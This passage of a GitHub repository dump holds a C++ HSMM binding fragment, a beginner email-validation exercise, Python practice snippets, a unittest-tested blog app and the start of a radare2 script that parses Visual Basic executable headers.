cyhton binding convenience\n\ntemplate <typename FloatType, typename IntType = int32_t>\nclass hsmmc\n{\n public:\n\n static void messages_backwards_log(\n int M, int T, FloatType *A, FloatType *aBl, FloatType *aDl, FloatType *aDsl,\n FloatType *betal, FloatType *betastarl, bool right_censoring, int trunc)\n { hsmm::messages_backwards_log(M,T,A,aBl,aDl,aDsl,betal,betastarl,\n right_censoring,trunc); }\n\n static void sample_forwards_log(\n int M, int T, FloatType *A, FloatType *pi0, FloatType *aBl, FloatType *aDl,\n FloatType *betal, FloatType *betastarl,\n IntType *stateseq, FloatType *randseq)\n { hsmm::sample_forwards_log(M,T,A,pi0,aBl,aDl,betal,betastarl,stateseq,randseq); }\n};\n\n#endif\n" } ]
6
mapugliese/basic-email-validation
https://github.com/mapugliese/basic-email-validation
48f046cfdd980511a8a6928c51acf564c5610493
110b43ab7337fea50b6eb1a3a751dffacdd92497
3d07b0e83d07a4677942dfe3f55af1396f3bd58e
refs/heads/main
2023-02-15T09:27:43.339610
2021-01-17T05:17:25
2021-01-17T05:17:25
330,081,161
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.705365002155304, "alphanum_fraction": 0.7080035209655762, "avg_line_length": 41.11111068725586, "blob_id": "d374d1ce531a6274db94389c3afa9c8d0b6552ed", "content_id": "2bf91993bbeb92f756ab40c02dfac01485122b72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1147, "license_type": "no_license", "max_line_length": 144, "num_lines": 27, "path": "/README.md", "repo_name": "mapugliese/basic-email-validation", "src_encoding": "UTF-8", "text": "# email-validation\nfunction that determines if a string is a valid email address\n\nfrom https://edabit.com/challenge/TBCujkw9D8hrEgFc4:\n\n Basic E-Mail Validation\n Create a function that accepts a string, checks if it's a valid email address and returns either True or False, depending on the evaluation.\n\n The string must contain an @ character.\n The string must contain a . character.\n The @ must have at least one character in front of it.\n e.g. \"[email protected]\" is valid while \"@edabit.com\" is invalid.\n The . and the @ must be in the appropriate places.\n e.g. \"hello.email@com\" is invalid while \"[email protected]\" is valid.\n If the string passes these tests, it's considered a valid email address.\n\n Examples\n validate_email(\"@gmail.com\") ➞ False\n validate_email(\"hello.gmail@com\") ➞ False\n validate_email(\"gmail\") ➞ False\n validate_email(\"hello@gmail\") ➞ False\n validate_email(\"[email protected]\") ➞ True\n\n Notes\n Check the Tests tab to see exactly what's being evaluated.\n You can solve this challenge with RegEx, but it's intended to be solved with logic.\n Solutions using RegEx will be accepted but frowned upon :(\n" }, { "alpha_fraction": 0.4784291982650757, "alphanum_fraction": 0.4900442361831665, "avg_line_length": 34.20000076293945, "blob_id": "4011184f221aad37321faaa0c2f68a83e9dd07c0", "content_id": "b5516389c32284cbbdd62ddeeec45ff113b11395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1808, "license_type": "no_license", "max_line_length": 77, "num_lines": 50, "path": "/email_validation.py", "repo_name": "mapugliese/basic-email-validation", "src_encoding": "UTF-8", "text": "def is_email(email):\r\n '''Function to determine if a given string is a valid email address'''\r\n\r\n if email.count('@') == 1:\r\n # Splits function into local address and domain\r\n # [email protected] ==> local = 'sample', domain = '@gmail.com'\r\n local = email[0: email.index('@')]\r\n domain = email[email.index('@'):]\r\n\r\n else:\r\n return False\r\n\r\n # Ensures the email has a local address and domain\r\n if len(local) > 0 and len(domain) > 0:\r\n\r\n # A local address cannot begin with the following characters\r\n if local[0] != ['-', '_', '.', '0', '1', '2', '3', '4', '5', '6',\r\n '7', '8', '9']:\r\n\r\n # A local address cannot contain the following characters\r\n # Need for loop bc 'in' can only take a string\r\n for x in ['<', '>', '(' , ')', '[', ']', ';', ':', ',', '@', \r\n R'\\ ']:\r\n\r\n if x in local:\r\n return False\r\n else:\r\n return False\r\n\r\n # The length of web address cannot be longer than 64 and must contain\r\n # and an extension beginning in a period (e.g. '.com')\r\n if len(domain) < 64 and domain.count('.') == 1:\r\n\r\n # stores the domain name without the extension\r\n domain_name = domain[1:domain.index('.')]\r\n\r\n # '-' is the only non-alphanumeric character that can be in a\r\n # domain and therefore, it is easiest just to remove it\r\n if '-' in domain_name:\r\n domain_name = domain_name.remove('-')\r\n \r\n # Determines if the domain is alphanumeric\r\n if domain_name.isalnum():\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False" }, { "alpha_fraction": 0.6972318291664124, "alphanum_fraction": 0.6972318291664124, "avg_line_length": 24.363636016845703, "blob_id": "d2aef058df19ae2161e5ea09e591eac99ea9283c", "content_id": "a564eb0da6026ac28dae069c3a2181b8fbeee67e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 51, "num_lines": 22, "path": "/email_validation_basic_test.py", "repo_name": "mapugliese/basic-email-validation", "src_encoding": "UTF-8", "text": "import email_validation\r\n\r\nprint(email_validation.is_email('@edabit.com'))\r\n# False\r\nprint(email_validation.is_email('@edabit'))\r\n# False\r\nprint(email_validation.is_email('[email protected]'))\r\n# True\r\nprint(email_validation.is_email(''))\r\n# False\r\nprint(email_validation.is_email('hello.gmail@com'))\r\n# False\r\nprint(email_validation.is_email('[email protected]'))\r\n# True\r\nprint(email_validation.is_email('hello@email'))\r\n# False\r\nprint(email_validation.is_email('%^%$#%^%'))\r\n# False\r\nprint(email_validation.is_email('www.email.com'))\r\n# False\r\nprint(email_validation.is_email('email'))\r\n# False" } ]
3
AndrewOdiit/TDD
https://github.com/AndrewOdiit/TDD
cc9e4f844a916b9c27be29facae5357bc07cf05d
4518d7d824a67ddd4312de9a6abfd37e1f550ebc
5223ed61fad9b4ceccce5a165d4ce92e139dc112
refs/heads/master
2020-08-31T22:35:35.286659
2019-11-27T16:49:18
2019-11-27T16:49:18
218,802,432
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5345744490623474, "alphanum_fraction": 0.539893627166748, "avg_line_length": 31.69565200805664, "blob_id": "2917c5a49ffc05957b00051fd957eddd6ee773de", "content_id": "bbe170543bd8a95b8df7cb8ae406c9a95b459af1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 752, "license_type": "no_license", "max_line_length": 66, "num_lines": 23, "path": "/TDD/blogapp/tests/integration/test_blog.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nfrom blogapp.blog import Blog\n\n\nclass Test_Blog(TestCase):\n def test_create_post(self):\n b = Blog(\"andrew's life\", \"andrew\")\n b.create_post(\"hello\", \"hello world\")\n self.assertTrue(type(b.posts) == list)\n\n self.assertEqual(\"hello\", b.posts[0].title)\n self.assertEqual(\"hello world\", b.posts[0].content)\n\n def test_json(self):\n b = Blog(\"andrew's life\", \"andrew\")\n b.create_post(\"hello\", \"hello world\")\n expected = {\"title\": b.title, \"author\": b.author, \"posts\":\n [{\n \"title\": b.posts[0].title,\n \"content\": b.posts[0].content\n }]}\n\n self.assertEqual(expected, b.json())\n" }, { "alpha_fraction": 0.5857142806053162, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 13, "blob_id": "d5b759ee391754bcdc6b9482f44cbd5af8b845e3", "content_id": "a7522b521f7f7f2b097dc85cfd9666f5a2db7d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": "no_license", "max_line_length": 24, "num_lines": 5, "path": "/Pythonrefresher/kargs.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "def my_method(*args):\n return sum(args)\n\n\nprint(my_method(22, 33))\n" }, { "alpha_fraction": 0.5581853985786438, "alphanum_fraction": 0.5660749673843384, "avg_line_length": 20.125, "blob_id": "344d339cbc6f08f403b1d7b8728985fec62e900c", "content_id": "f42432a6d2915629eccc7e034de1577f82a48ef7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 55, "num_lines": 24, "path": "/Pythonrefresher/deco.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import functools\n\n\ndef decorator_with_args(number):\n def my_decorator(func):\n @functools.wraps(func)\n def function_that_runs_func():\n print(\"In the decorator\")\n if number <= 56:\n return \"not running function...exiting\"\n else:\n func()\n print(\"After decorator\")\n\n return function_that_runs_func\n return my_decorator\n\n\n@decorator_with_args(76)\ndef my_function():\n print(\"Hello\")\n\n\nprint(my_function())\n" }, { "alpha_fraction": 0.6481481194496155, "alphanum_fraction": 0.6481481194496155, "avg_line_length": 14.882352828979492, "blob_id": "8902eadf2b7af4ca691c3aed65830fb45600c04b", "content_id": "3ff1d8b4ac3034d282f341e5b816af4f56e5d315", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 34, "num_lines": 17, "path": "/Pythonrefresher/hof.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import functools\n\n\ndef my_decorator(func):\n @functools.wraps(func)\n def function_that_runs_func():\n print(\"In the decorator\")\n func()\n return function_that_runs_func\n\n\n@my_decorator\ndef my_function():\n print(\"I'm the function\")\n\n\nmy_function()\n" }, { "alpha_fraction": 0.5912531614303589, "alphanum_fraction": 0.5923745632171631, "avg_line_length": 42.087501525878906, "blob_id": "a46b0d4bd74b182afdc88e4ef283899e08fae025", "content_id": "922027edcba75eb448f814d662cc1caab6b8fce7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3567, "license_type": "no_license", "max_line_length": 89, "num_lines": 80, "path": "/TDD/blogapp/tests/system/test_app.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "# system tests , test the entry point to the application\nfrom unittest import TestCase\nfrom unittest.mock import patch\nimport blogapp.app as app\nfrom blogapp.blog import Blog\nfrom blogapp.app import MENU_PROMPT\n\n# patch allows you to test a function that would otherwise not be testable\n# A mock object substitutes and imitates a real object within a testing environment\n\n\nclass TestApp(TestCase):\n #this test is not working \n def setUp(self):\n blog = Blog('Test', 'TestAuthor')\n app.blogs = {'Test': blog}\n\n def test_menu_prints_prompt(self):\n with patch(\"builtins.print\") as mocked_print:\n with patch(\"builtins.input\" ,return_value ='q' ):\n app.menu()\n mocked_print.assert_called()\n def test_print_blog(self):\n # an instance of Blog class, has access to all its methods\n with patch('builtins.print') as mocked_print:\n # on printing the blog , the __repr__ method of the blog class will be called\n app.print_blogs()\n mocked_print.assert_called_with(\n 'title:Test , author:TestAuthor, posts:0')\n\n def test_menu_calls_print_blogs(self):\n with patch(\"blogapp.app.print_blogs\") as mocked_print_blogs:\n with patch(\"builtins.input\", return_value ='q'):\n app.menu()\n mocked_print_blogs.assert_called()\n\n def test_app_ask_create_blog(self):\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect = ('Test', 'Test Author')\n app.ask_create_blog()\n self.assertIsNotNone(app.blogs.get('Test'))\n\n def test_app_ask_to_read_blog(self):\n blog = app.blogs['Test']\n blog.create_post('TestBlog','testing blog')\n with patch('builtins.input', return_value ='Test'):\n with patch('blogapp.app.print_posts') as mocked_print_posts:\n app.ask_read_blog()\n mocked_print_posts.assert_called_with(blog)\n def test_app_create_post(self):\n blog = app.blogs['Test']\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect = ('Test', 'Testtitle', 'Testcontent')\n app.ask_create_post()\n self.assertTrue(len(blog.posts)> 0)\n self.assertEqual(blog.posts[0].title , \"Testtitle\")\n self.assertEqual(blog.posts[0].content , \"Testcontent\")\n\n #when you mock a method , the real method is replaced with a mock\n #therefore the real method is not actually called.\n def test_menu_calls_create_blog(self):\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect =('c', 'testTitle', 'testAuthor','q')\n app.menu()\n #mocked_create_blog.assert_called()\n self.assertIsNotNone(app.blogs.get('testTitle'))\n\n def test_menu_calls_ask_read_blog(self):\n with patch(\"blogapp.app.ask_read_blog\") as mocked_read_blog:\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect =('r', 'Test','q')\n app.menu()\n mocked_read_blog.assert_called()\n\n def test_menu_calls_ask_create_post(self):\n with patch(\"blogapp.app.ask_create_post\") as mocked_read_blog:\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect =('p','Test','q')\n app.menu()\n mocked_read_blog.assert_called()\n \n \n\n \n\n\n\n \n\n \n \n \n \n\n\n \n\n\n\n\n \n" }, { "alpha_fraction": 0.6029411554336548, "alphanum_fraction": 0.6323529481887817, "avg_line_length": 21.66666603088379, "blob_id": "c2cba6f3e524e36140336888eaaea1b58ef7365a", "content_id": "268f77eef55eff3e9dac805c93cddcfbdcbff07c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 73, "num_lines": 9, "path": "/Pythonrefresher/comps.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "student = {'name': 'jose', 'school': 'Computing', 'grades': (66, 77, 88)}\n\n\ndef average_grade(data: dict):\n grades = data['grades']\n return sum(grades) / len(grades)\n\n\nprint(average_grade(student))\n" }, { "alpha_fraction": 0.6179921627044678, "alphanum_fraction": 0.6310299634933472, "avg_line_length": 26.321428298950195, "blob_id": "716c27569ca0f31e28fdf05e5786afd1c6d6068a", "content_id": "7a5b21cfbc744bf6541130f7ec2253a60c409dff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 767, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/Pythonrefresher/OOP.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "\n\nclass Student:\n def __init__(self, name, school):\n self.name = name\n self.school = school\n self.marks = []\n\n def average(self):\n return sum(self.marks)/len(self.marks)\n\n @classmethod\n def friend(cls, name, origin, *args):\n return cls(name, origin.school, *args)\n\n\nclass WorkingStudent(Student):\n def __init__(self, name, school, salary, job_title):\n super().__init__(name, school)\n self.salary = salary\n self.job_title = job_title\n\n\n# school\nstudent = Student(\"Andrew\", \"USIU\")\nfriend = Student.friend(\"Slim\", student)\nanna = WorkingStudent(\"Anna\", \"USIU\", 4000.00, \"HR Manager\")\nprint(anna.salary)\nfriend = WorkingStudent.friend(\"Jason\", anna, 3800, \"Software Engineer\")\nprint(friend.salary)\n" }, { "alpha_fraction": 0.6303501725196838, "alphanum_fraction": 0.6303501725196838, "avg_line_length": 33.266666412353516, "blob_id": "5277746e38c19ab60ef7591b08efc9c42dade6a3", "content_id": "6f871d636e5874711febfd4726cdf934764e15b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 100, "num_lines": 15, "path": "/TDD/blogapp/tests/unit/test_blog.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import unittest\nfrom blogapp.blog import Blog\nfrom blogapp.post import Post\n\n\nclass BlogTest(unittest.TestCase):\n def test_create_blog(self):\n b = Blog(\"andrew's life\", \"andrew\")\n self.assertEqual(\"andrew's life\", b.title)\n self.assertEqual(\"andrew\", b.author)\n\n def test_repr_method(self):\n b = Blog(\"Andrew's blog\", \"andrew\")\n self.assertTrue(type(b.__repr__()) == str)\n self.assertEqual(f\"title:{b.title} , author:{b.author}, posts:{len(b.posts)}\", b.__repr__())\n" }, { "alpha_fraction": 0.43589743971824646, "alphanum_fraction": 0.5780885815620422, "avg_line_length": 20.450000762939453, "blob_id": "124615fac316a7771bb55e0621a9ec0a4545cc73", "content_id": "a8029678ca3a490083ff6726a442e6e3cc97fc94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 429, "license_type": "no_license", "max_line_length": 55, "num_lines": 20, "path": "/Pythonrefresher/lts.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "# set1 = {1, 2, 3, 4, 5, 6, 9}\n\n# set2 = {5, 12, 4, 7, 9, 15, 12}\n\n# set_comp = {x for x in set1 if x in set2} # method 1\n\n# intersect = set1.intersection(set2)\n# print(set_comp)\n# print(intersect)\n# print(set1.union(set2)) # without repeatition\n# print(set1.difference(set2))\n\nmy_list = [30, 60, 10]\nmy_tuple = (1,)\n\n# set1 = {1, 2, 3, 4, 5, 6, 9, 12, 77}\n\n# set2 = {5, 12, 7, 9, 15, 12, 77}\n\n# print(set1.intersection(set2))\n" }, { "alpha_fraction": 0.6459459662437439, "alphanum_fraction": 0.6459459662437439, "avg_line_length": 20.764705657958984, "blob_id": "36f6cb5ff12965765b3a12e5a125f33bab4a3521", "content_id": "c87e4119c40b565a2342778befc96f58f9d2ec95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 370, "license_type": "no_license", "max_line_length": 61, "num_lines": 17, "path": "/Pythonrefresher/loops.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "people_you_know = []\n\n\ndef who_do_you_know():\n friends = input('please enter a list of people you know')\n friends = friends.strip() # remove whitespace\n people_you_know = friends.split()\n return ask_user(people_you_know)\n\n\ndef ask_user(lst) -> bool:\n name = input(\"please enter a name: \")\n print(lst)\n return name in lst\n\n\nprint(who_do_you_know())\n" }, { "alpha_fraction": 0.5844544172286987, "alphanum_fraction": 0.5844544172286987, "avg_line_length": 32.29999923706055, "blob_id": "35b884d9c7a02a5d6860d9a4b20d74cb0cd1226e", "content_id": "7f45ad1702fa500b7982209829524af234e191c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 84, "num_lines": 20, "path": "/TDD/blogapp/blog.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from TDD.blogapp import post\nclass Blog:\n def __init__(self, title, author):\n self.title = title\n self.author = author\n self.posts = []\n\n def __repr__(self):\n return f\"title:{self.title} , author:{self.author}, posts:{len(self.posts)}\"\n\n def create_post(self, title, content):\n if(title is None or content is None):\n return f\"expected string instead got {title or content}\"\n p = post.Post(title, content)\n self.posts.append(p)\n return self.posts\n\n def json(self):\n return {\"title\": self.title, \"author\": self.author, \"posts\":\n [post.json() for post in self.posts]}\n\n\n\n" }, { "alpha_fraction": 0.6213592290878296, "alphanum_fraction": 0.6213592290878296, "avg_line_length": 33.33333206176758, "blob_id": "ea8178e79b47e5f8abfe98eaa7cc901f0cc1a9ea", "content_id": "2790da595de8967e50e0c0253f3663adc9473983", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 515, "license_type": "no_license", "max_line_length": 78, "num_lines": 15, "path": "/TDD/blogapp/tests/unit/test_post.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nfrom blogapp.post import Post\n\n\nclass TestPosts(TestCase):\n def test_post(self):\n post = Post(\"andrew\", \"my first post\")\n self.assertTrue(type(post.title) == str and type(post.content) == str)\n\n def test_json(self):\n # returns title and content\n post = Post(\"my first post\", \"This is my first post\")\n expected = {'title': \"my first post\",\n 'content': \"This is my first post\"}\n self.assertDictEqual(post.json(), expected)\n" }, { "alpha_fraction": 0.6491228342056274, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20.375, "blob_id": "b893c385d9b4a83ced8975db209019772067de7b", "content_id": "b52d6acf71a2b9a35e70f7e928319bd0ddd6f39e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 33, "num_lines": 8, "path": "/TDD/blogapp/tests/unit/test_add.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import unittest\nfrom blogapp.add import add_nums\n\n\nclass TestAdd(unittest.TestCase):\n def test_add(self):\n res = add_nums(1, 2)\n self.assertEqual(3, res)\n" }, { "alpha_fraction": 0.5924637913703918, "alphanum_fraction": 0.5924637913703918, "avg_line_length": 30.03636360168457, "blob_id": "e7ae72abb1ff828c691f3b0a5a6ff1ce98ebb915", "content_id": "ee537898007fec26b65ba86589785ef742b648dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1725, "license_type": "no_license", "max_line_length": 105, "num_lines": 55, "path": "/TDD/blogapp/app.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from TDD.blogapp import blog\nfrom TDD.blogapp import post\nMENU_PROMPT = \"Enter 'c' to create a blog , 'l' to list blogs, 'r' to read one , 'p' to create a post: \"\nblogs = dict()\n\ndef print_blogs():\n for _, blog in blogs.items():\n print(f'{blog}')\n\ndef ask_create_blog():\n #ask the user for new bog title and name\n #store it in blogs dictionary\n blog_title = input(\"Enter blog title: \")\n blog_author = input(\"Enter blog author: \")\n blogs[blog_title] = blog.Blog(blog_title, blog_author)\n\ndef ask_create_post():\n blog_title = input(\"please enter name of blog to create post in: \")\n if (blog_title in blogs):\n print(\"input is valid\")\n post_title = input(\"please enter a post title: \")\n post_content = input(\"please enter post content: \")\n blogs[blog_title].create_post(post_title, post_content)\n else:\n print(\"This blog does not exist, please enter a valid blog name\")\n \ndef ask_read_blog():\n blog_name = input(\"Please enter the name of a blog to read: \")\n if(blogs.get(blog_name) is None):\n return \"This blog is not available\"\n else:\n blog = blogs.get(blog_name)\n return print_posts(blog)\n \ndef print_posts(blog):\n for post in blog.posts:\n print_post(post)\n\ndef print_post(post):\n print(f\"{post.title} , {post.content}\")\n\ndef menu():\n print_blogs()\n choice = input(MENU_PROMPT)\n while choice !='q':\n if choice == 'c':\n ask_create_blog()\n elif choice == 'r':\n ask_read_blog()\n elif choice == 'p':\n ask_create_post()\n elif choice =='l':\n print_blogs()\n choice = input(MENU_PROMPT)\n return 'goodbye'\n \n\n\n \n\n\n\n" } ]
14
Trietptm-on-Coding-Algorithms/r2_scripts
https://github.com/Trietptm-on-Coding-Algorithms/r2_scripts
19cd0826ef4c7e7d6aa425193200747eb8138748
91af4afe287385255e58f58e39ce5a78097141df
2815b55c1450bc9a66c807f6bbac2355945d37ee
refs/heads/master
2021-10-08T06:01:35.366063
2018-12-08T16:01:24
2018-12-08T16:01:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7291666865348816, "alphanum_fraction": 0.7583333253860474, "avg_line_length": 25.66666603088379, "blob_id": "3374fde8fe30ee9daab47d1cb2af43071f0de628", "content_id": "84ae584770e4f25c068f1b3e389f6268f8d9ca99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 240, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/README.md", "repo_name": "Trietptm-on-Coding-Algorithms/r2_scripts", "src_encoding": "UTF-8", "text": "# Radare2 scripts\n\nVarious radare2 scripts I use (or create). Only works with Python2 since python3\nr2pipe bindings seem broken now.\n\n## vb_analysis.py\n\nUsage: invoke it with `#!pipe python2 vb_analysis.py` inside a r2 (or cutter)\nsession.\n" }, { "alpha_fraction": 0.5395718812942505, "alphanum_fraction": 0.6040928363800049, "avg_line_length": 39.38660430908203, "blob_id": "e1050ca6b3efd39fe90de380066aa029914ff858", "content_id": "b600b48af53d4c9e2414b0e63d6873fb95d13f54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26534, "license_type": "no_license", "max_line_length": 122, "num_lines": 657, "path": "/vb_analysis.py", "repo_name": "Trietptm-on-Coding-Algorithms/r2_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# Port of \"VB Exe Parser\" script to radare2 by aaSSfxxx\n# Original credits to Vic P. aka vic4key (vic4key[at]gmail.com)\n# Original script: https://github.com/Kinimiwar/VB-Exe-Parser/\n\nimport r2pipe\nimport ctypes\nimport sys\n\nclass CVBHeader(ctypes.Structure):\n _fields_ = [\n (\"szVbMagic\", ctypes.c_ubyte*4), # 0x0. \"VB5!\"\" String\n (\"wRuntimeBuild\", ctypes.c_ushort), # 0x4. Build of the VB6 Runtime\n (\"szLangDll\", ctypes.c_ubyte*14), # 0x6. Language Extension DLL\n (\"szSecLangDll\", ctypes.c_ubyte*14), # 0x14. 2nd Language Extension DLL\n (\"wRuntimeRevision\", ctypes.c_ushort), # 0x22. Internal Runtime Revision\n (\"dwLCID\", ctypes.c_uint), # 0x24. LCID of Language DLL\n (\"dwSecLCID\", ctypes.c_uint), # 0x28. LCID of 2nd Language DLL\n (\"lpSubMain\", ctypes.c_uint), # 0x2C. Pointer to Sub Main Code\n (\"lpProjectData\", ctypes.c_uint), # 0x30. Pointer to Project Data\n (\"fMdlIntCtls\", ctypes.c_uint), # 0x34. VB Control Flags for IDs < 32\n (\"fMdlIntCtls2\", ctypes.c_uint), # 0x38. VB Control Flags for IDs > 32\n (\"dwThreadFlags\", ctypes.c_uint), # 0x3C. Threading Mode\n (\"dwThreadCount\", ctypes.c_uint), # 0x40. Threads to support in pool\n (\"wFormCount\", ctypes.c_ushort), # 0x44. Number of forms present\n (\"wExternalCount\", ctypes.c_ushort), # 0x46. Number of external controls\n (\"dwThunkCount\", ctypes.c_uint), # 0x48. Number of thunks to create\n (\"lpGuiTable\", ctypes.c_uint), # 0x4C. Pointer to GUI Table\n (\"lpExternalTable\", ctypes.c_uint), # 0x50. Pointer to External Table\n (\"lpComRegisterData\", ctypes.c_uint), # 0x54. Pointer to COM Information\n (\"bSZProjectDescription\", ctypes.c_uint), # 0x58. Offset to Project Description\n (\"bSZProjectExeName\", ctypes.c_uint), # 0x5C. Offset to Project EXE Name\n (\"bSZProjectHelpFile\", ctypes.c_uint), # 0x60. Offset to Project Help File\n (\"bSZProjectName\", ctypes.c_uint) # 0x64. Offset to Project Name\n ]\n\nclass CVBProjectInfo(ctypes.Structure):\n _fields_ = [\n (\"dwVersion\", ctypes.c_uint), # 0x0. 5.00 in Hex (0x1F4). Version.\n (\"lpObjectTable\", ctypes.c_uint), # 0x4. Pointer to the Object Table\n (\"dwNull\", ctypes.c_uint), # 0x8. Unused value after compilation.\n (\"lpCodeStart\", ctypes.c_uint), # 0xC. Points to start of code. Unused.\n (\"lpCodeEnd\", ctypes.c_uint), # 0x10. Points to end of code. Unused.\n (\"dwDataSize\", ctypes.c_uint), # 0x14. Size of VB Object Structures. Unused.\n (\"lpThreadSpace\", ctypes.c_uint), # 0x18. Pointer to Thread Object.\n (\"lpVbaSeh\", ctypes.c_uint), # 0x1C. Pointer to VBA Exception Handler\n (\"lpNativeCode\", ctypes.c_uint), # 0x20. Pointer to .DATA section.\n (\"szPathInformation\", ctypes.c_ubyte*528), # 0x24. Contains Path and ID string. < SP6\n (\"lpExternalTable\", ctypes.c_uint), # 0x234. Pointer to External Table.\n (\"dwExternalCount\", ctypes.c_uint) # 0x238. Objects in the External Table.\n ]\n\nclass CVBProjectInfo2(ctypes.Structure):\n _fields_ = [\n (\"lpHeapLink\", ctypes.c_uint), # 0x0. Unused after compilation, always 0.\n (\"lpObjectTable\", ctypes.c_uint), # 0x4. Back-Pointer to the Object Table.\n (\"dwReserved\", ctypes.c_uint), # 0x8. Always set to -1 after compiling. Unused\n (\"dwUnused\", ctypes.c_uint), # 0xC. Not written or read in any case.\n (\"lpObjectList\", ctypes.c_uint), # 0x10. Pointer to Object Descriptor Pointers.\n (\"dwUnused2\", ctypes.c_uint), # 0x14. Not written or read in any case.\n (\"szProjectDescription\", ctypes.c_uint), # 0x18. Pointer to Project Description\n (\"szProjectHelpFile\", ctypes.c_uint), # 0x1C. Pointer to Project Help File\n (\"dwReserved2\", ctypes.c_uint), # 0x20. Always set to -1 after compiling. Unused\n (\"dwHelpContextId\", ctypes.c_uint) # 0x24. Help Context ID set in Project Settings.\n ]\n\nclass CVBObjectTable(ctypes.Structure):\n _fields_ = [\n (\"lpHeapLink\", ctypes.c_uint), # 0x0. Unused after compilation, always 0.\n (\"lpExecProj\", ctypes.c_uint), # 0x4. Pointer to VB Project Exec COM Object.\n (\"lpProjectInfo2\", ctypes.c_uint), # 0x8. Secondary Project Information.\n (\"dwReserved\", ctypes.c_uint), # 0xC. Always set to -1 after compiling. Unused.\n (\"dwNull\", ctypes.c_uint), # 0x10. Not used in compiled mode.\n (\"lpProjectObject\", ctypes.c_uint), # 0x14. Pointer to in-memory Project Data.\n (\"uuidObject\", ctypes.c_ubyte*16), # 0x18. GUID of the Object Table.\n (\"fCompileState\", ctypes.c_ushort), # 0x28. Internal flag used during compilation.\n (\"dwTotalObjects\", ctypes.c_ushort), # 0x2A. Total objects present in Project.\n (\"dwCompiledObjects\", ctypes.c_ushort), # 0x2C. Equal to above after compiling.\n (\"dwObjectsInUse\", ctypes.c_ushort), # 0x2E. Usually equal to above after compile.\n (\"lpObjectArray\", ctypes.c_uint), # 0x30. Pointer to Object Descriptors\n (\"fIdeFlag\", ctypes.c_uint), # 0x34. Flag/Pointer used in IDE only.\n (\"lpIdeData\", ctypes.c_uint), # 0x38. Flag/Pointer used in IDE only.\n (\"lpIdeData2\", ctypes.c_uint), # 0x3C. Flag/Pointer used in IDE only.\n (\"lpszProjectName\", ctypes.c_uint), # 0x40. Pointer to Project Name.\n (\"dwLcid\", ctypes.c_uint), # 0x44. LCID of Project.\n (\"dwLcid2\", ctypes.c_uint), # 0x48. Alternate LCID of Project.\n (\"lpIdeData3\", ctypes.c_uint), # 0x4C. Flag/Pointer used in IDE only.\n (\"dwIdentifier\", ctypes.c_uint) # 0x50. Template Version of Structure.\n ]\n\nclass CVBPublicObjectDescriptors(ctypes.Structure):\n _fields_ = [\n (\"lpObjectInfo\", ctypes.c_uint), # 0x0. Pointer to the Object Info for this Object.\n (\"dwReserved\", ctypes.c_uint), # 0x4. Always set to -1 after compiling.\n (\"lpPublicBytes\", ctypes.c_uint), # 0x8. Pointer to Public Variable Size integers.\n (\"lpStaticBytes\", 